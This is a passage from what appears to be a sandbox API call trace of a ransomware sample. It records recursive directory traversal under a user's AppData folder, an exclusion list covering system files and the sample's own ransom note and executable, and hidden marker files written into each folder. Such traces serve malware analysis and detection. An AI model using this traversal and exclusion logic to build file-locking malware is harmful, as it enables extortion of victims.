ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeed2e4d7, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0062.926] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.926] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.926] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.926] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.926] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8addc228, ftCreationTime.dwHighDateTime=0x1d32716, ftLastAccessTime.dwLowDateTime=0xd1da511e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeed2e4d7, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.926] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.926] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.926] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.926] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.926] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.926] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeed2e4d7, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeed2e4d7, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeed2e4d7, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.926] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.926] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.926] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x8addc228, ftCreationTime.dwHighDateTime=0x1d32716, ftLastAccessTime.dwLowDateTime=0x8addc228, ftLastAccessTime.dwHighDateTime=0x1d32716, ftLastWriteTime.dwLowDateTime=0x8addc228, ftLastWriteTime.dwHighDateTime=0x1d32716, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CryptnetUrlCache", cAlternateFileName="CRYPTN~1")) returned 1 [0062.926] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.926] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.926] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2="Rabbit4444.exe") returned -1 [0062.926] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2=".") returned 1 [0062.926] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2="..") returned 1 [0062.926] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2="windows") returned -1 [0062.926] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2="bootmgr") returned 1 [0062.926] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2="pagefile.sys") returned -1 [0062.926] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2="boot") returned 1 [0062.926] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2="ids.txt") returned -1 [0062.926] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2="NTUSER.DAT") returned -1 [0062.926] lstrcpyW (in: lpString1=0x130ebea, lpString2="CryptnetUrlCache" | out: lpString1="CryptnetUrlCache") returned="CryptnetUrlCache" [0062.926] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache", dwFileAttributes=0x2010) returned 1 [0062.927] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122040 [0062.927] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd4) returned 0x123820 [0062.927] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122048 | out: ListHead=0xf68b0, ListEntry=0x122048) returned 0x1222e8 [0062.927] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x8addc228, ftCreationTime.dwHighDateTime=0x1d32716, ftLastAccessTime.dwLowDateTime=0x8addc228, ftLastAccessTime.dwHighDateTime=0x1d32716, ftLastWriteTime.dwLowDateTime=0x8addc228, ftLastWriteTime.dwHighDateTime=0x1d32716, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CryptnetUrlCache", cAlternateFileName="CRYPTN~1")) returned 0 [0062.927] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0062.927] lstrcpyW (in: lpString1=0x130ebea, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.927] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\ac\\microsoft\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0062.929] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0062.929] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.929] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.930] CloseHandle (hObject=0x2a0) returned 1 [0062.930] CloseHandle (hObject=0x298) returned 1 [0062.930] GetCurrentThreadId () returned 0xd98 [0062.930] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122048 [0062.930] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache" [0062.930] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123820 | out: hHeap=0xe0000) returned 1 [0062.930] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122040 | out: hHeap=0xe0000) returned 1 [0062.930] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache" [0062.930] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\" [0062.930] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\.BFC0E91B00AE8A0620D3" [0062.930] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\ac\\microsoft\\cryptneturlcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0062.931] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.934] FlushFileBuffers (hFile=0x298) returned 1 [0062.935] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.935] CloseHandle (hObject=0x298) returned 1 [0062.935] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache") returned 105 [0062.935] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.935] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8addc228, ftCreationTime.dwHighDateTime=0x1d32716, ftLastAccessTime.dwLowDateTime=0x8addc228, ftLastAccessTime.dwHighDateTime=0x1d32716, ftLastWriteTime.dwLowDateTime=0xeed5468c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0062.936] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.936] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.936] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.936] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.936] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8addc228, ftCreationTime.dwHighDateTime=0x1d32716, ftLastAccessTime.dwLowDateTime=0x8addc228, ftLastAccessTime.dwHighDateTime=0x1d32716, ftLastWriteTime.dwLowDateTime=0xeed5468c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.936] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.936] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.936] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.936] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.936] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.936] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeed5468c, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeed5468c, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeed5468c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.936] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.936] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.936] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x8addc228, ftCreationTime.dwHighDateTime=0x1d32716, ftLastAccessTime.dwLowDateTime=0xdaf50849, ftLastAccessTime.dwHighDateTime=0x1d336df, ftLastWriteTime.dwLowDateTime=0xdaf50849, ftLastWriteTime.dwHighDateTime=0x1d336df, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Content", cAlternateFileName="")) returned 1 [0062.936] lstrcmpiW (lpString1="Content", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.936] lstrcmpiW (lpString1="Content", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.936] lstrcmpiW (lpString1="Content", lpString2="Rabbit4444.exe") returned -1 [0062.936] lstrcmpiW (lpString1="Content", lpString2=".") returned 1 [0062.936] lstrcmpiW (lpString1="Content", lpString2="..") returned 1 [0062.936] lstrcmpiW (lpString1="Content", lpString2="windows") returned -1 [0062.936] lstrcmpiW (lpString1="Content", lpString2="bootmgr") returned 1 [0062.936] lstrcmpiW (lpString1="Content", lpString2="pagefile.sys") returned -1 [0062.936] lstrcmpiW (lpString1="Content", lpString2="boot") returned 1 [0062.936] lstrcmpiW (lpString1="Content", lpString2="ids.txt") returned -1 [0062.936] lstrcmpiW (lpString1="Content", lpString2="NTUSER.DAT") returned -1 [0062.936] lstrcpyW (in: lpString1=0x130ec0c, lpString2="Content" | out: lpString1="Content") returned="Content" [0062.936] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\Content", dwFileAttributes=0x2010) returned 1 [0062.937] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122200 [0062.937] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xe4) returned 0x116dd8 [0062.937] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122208 | out: ListHead=0xf68b0, ListEntry=0x122208) returned 0x1222e8 [0062.937] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x8addc228, ftCreationTime.dwHighDateTime=0x1d32716, ftLastAccessTime.dwLowDateTime=0xdaf50849, ftLastAccessTime.dwHighDateTime=0x1d336df, ftLastWriteTime.dwLowDateTime=0xdaf50849, ftLastWriteTime.dwHighDateTime=0x1d336df, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MetaData", cAlternateFileName="")) returned 1 [0062.937] lstrcmpiW (lpString1="MetaData", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.937] lstrcmpiW (lpString1="MetaData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.937] lstrcmpiW (lpString1="MetaData", lpString2="Rabbit4444.exe") returned -1 [0062.937] lstrcmpiW (lpString1="MetaData", lpString2=".") returned 1 [0062.937] lstrcmpiW (lpString1="MetaData", lpString2="..") returned 1 [0062.937] lstrcmpiW (lpString1="MetaData", lpString2="windows") returned -1 [0062.937] lstrcmpiW (lpString1="MetaData", lpString2="bootmgr") returned 1 [0062.937] lstrcmpiW (lpString1="MetaData", lpString2="pagefile.sys") returned -1 [0062.938] lstrcmpiW (lpString1="MetaData", lpString2="boot") returned 1 [0062.938] lstrcmpiW (lpString1="MetaData", lpString2="ids.txt") returned 1 [0062.938] lstrcmpiW (lpString1="MetaData", lpString2="NTUSER.DAT") returned -1 [0062.938] lstrcpyW (in: lpString1=0x130ec0c, lpString2="MetaData" | out: lpString1="MetaData") returned="MetaData" [0062.938] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData", dwFileAttributes=0x2010) returned 1 [0062.938] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122300 [0062.938] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xe6) returned 0x116fb8 [0062.938] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122308 | out: ListHead=0xf68b0, ListEntry=0x122308) returned 0x122208 [0062.938] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x8addc228, ftCreationTime.dwHighDateTime=0x1d32716, ftLastAccessTime.dwLowDateTime=0xdaf50849, ftLastAccessTime.dwHighDateTime=0x1d336df, ftLastWriteTime.dwLowDateTime=0xdaf50849, ftLastWriteTime.dwHighDateTime=0x1d336df, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MetaData", cAlternateFileName="")) returned 0 [0062.938] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0062.939] lstrcpyW (in: lpString1=0x130ec0c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.939] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\ac\\microsoft\\cryptneturlcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0062.941] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0062.941] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.941] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.941] CloseHandle (hObject=0x2a0) returned 1 [0062.941] CloseHandle (hObject=0x298) returned 1 [0062.941] GetCurrentThreadId () returned 0xd98 [0062.941] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122308 [0062.941] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData" [0062.941] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116fb8 | out: hHeap=0xe0000) returned 1 [0062.941] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122300 | out: hHeap=0xe0000) returned 1 [0062.941] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData" [0062.942] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\" [0062.942] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\.BFC0E91B00AE8A0620D3" [0062.942] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\ac\\microsoft\\cryptneturlcache\\metadata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0062.944] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.946] FlushFileBuffers (hFile=0x298) returned 1 [0062.947] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.947] CloseHandle (hObject=0x298) returned 1 [0062.948] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData") returned 114 [0062.948] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.948] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8addc228, ftCreationTime.dwHighDateTime=0x1d32716, ftLastAccessTime.dwLowDateTime=0xdaf50849, ftLastAccessTime.dwHighDateTime=0x1d336df, ftLastWriteTime.dwLowDateTime=0xeed7a88c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102590 [0062.948] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.948] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.948] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.948] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.948] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8addc228, ftCreationTime.dwHighDateTime=0x1d32716, ftLastAccessTime.dwLowDateTime=0xdaf50849, ftLastAccessTime.dwHighDateTime=0x1d336df, ftLastWriteTime.dwLowDateTime=0xeed7a88c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.948] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.948] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.948] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.948] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.948] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.948] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeed7a88c, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeed7a88c, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeed7a88c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.948] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.949] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.949] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xdad3a977, ftCreationTime.dwHighDateTime=0x1d336df, ftLastAccessTime.dwLowDateTime=0xdad3a977, ftLastAccessTime.dwHighDateTime=0x1d336df, ftLastWriteTime.dwLowDateTime=0xff50e022, ftLastWriteTime.dwHighDateTime=0x1d336df, nFileSizeHigh=0x0, nFileSizeLow=0x190, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", cAlternateFileName="40E450~1")) returned 1 [0062.949] lstrcmpiW (lpString1="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 